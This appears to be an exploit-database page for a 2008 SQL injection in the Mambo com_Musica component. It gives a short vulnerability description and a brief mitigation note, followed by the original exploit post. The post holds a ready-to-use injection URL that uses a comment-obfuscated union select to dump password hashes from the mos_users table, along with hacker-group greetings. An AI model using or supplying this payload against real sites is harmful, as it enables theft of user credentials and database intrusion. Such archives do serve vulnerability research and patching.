header-logo
Suggest Exploit
vendor:
com_Musica
by:
The-0utl4w
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_Musica
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mambo com_Musica “id” Remote SQL Injection

An attacker can exploit a SQL injection vulnerability in Mambo com_Musica component. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'tasko' and 'task' parameters are set to 'viewo' and 'view2' respectively. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the affected application, disclose sensitive information, modify data, or exploit further vulnerabilities in the underlying database or operating system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use stored procedures and parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection


index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

Original Link:
http://forum.aria-security.net/showthread.php?t=588

Regards,
The-0utl4w

# milw0rm.com [2008-03-01]